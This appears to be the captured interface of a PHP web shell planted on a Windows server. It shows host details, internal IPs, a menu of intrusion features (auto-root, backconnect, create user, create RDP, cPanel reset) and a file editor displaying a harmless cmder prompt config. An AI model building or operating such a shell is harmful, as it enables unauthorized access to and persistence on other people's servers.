Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
laragon /
bin /
cmder /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
profile.d
[ DIR ]
drwxrwxrwx
Readme.md
887
B
-rw-rw-rw-
clink.log
2.54
KB
-rw-rw-rw-
clink_history
33
B
-rw-rw-rw-
clink_settings
518
B
-rw-rw-rw-
cmder_prompt_config.lua
1.91
KB
-rw-rw-rw-
user-ConEmu.xml
53.5
KB
-rw-rw-rw-
user_aliases.cmd
397
B
-rwxrwxrwx
user_profile.cmd
721
B
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cmder_prompt_config.lua
-- All of the below was 'borrowed' from https://github.com/AmrEldib/cmder-powerline-prompt --- REQUIRED. config_prompt_type is whether the displayed prompt is the full path or only the folder name -- Use: -- "full" for full path like C:\Windows\System32 -- "folder" for folder name only like System32 -- default is full prompt_type = "full" --- REQUIRED. config_prompt_useHomeSymbol is whether to show ~ instead of the full path to the user's home folder -- Use true or false -- default is false prompt_useHomeSymbol = false -- Symbols -- REQUIRED. Prompt displayed instead of user's home folder e.g. C:\Users\username -- default is '~' prompt_homeSymbol = "~" -- REQUIRED. Symbol displayed in the new line below the prompt. -- default is 'λ' prompt_lambSymbol = "λ" -- REQUIRED. Adds [user]@[host] to the beginning of the prompt like bash -- default is false prompt_useUserAtHost = false -- REQUIRED. If true prompt is a single line instead of default two line prompt. -- default is false prompt_singleLine = false -- OPTIONAL. If true then always ignore the cmder.status and cmder.cmdstatus git config settings and run the git prompt commands in the background. -- default is false -- NOTE: This only takes effect if using Clink v1.2.10 or higher. prompt_overrideGitStatusOptIn = false -- OPTIONAL. If true then Cmder includes git, mercurial, and subversion status in the prompt. -- default is true prompt_includeVersionControl = true -- Prompt Attributes -- -- Colors -- Green: "\x1b[1;33;40m" -- Yellow: "\x1b[1;32;40m" -- Light Grey: "\x1b[1;30;40m" -- Prompt Element Colors uah_color = "\x1b[1;33;40m" -- Green = uah = [user]@[hostname] cwd_color = "\x1b[1;32;40m" -- Yellow cwd = Current Working Directory lamb_color = "\x1b[1;30;40m" -- Light Grey = Lambda Color clean_color = "\x1b[1;37;40m" dirty_color = "\x1b[33;3m" conflict_color = "\x1b[31;1m" unknown_color = "\x1b[37;1m" -- White = No VCS Status Branch Color
Close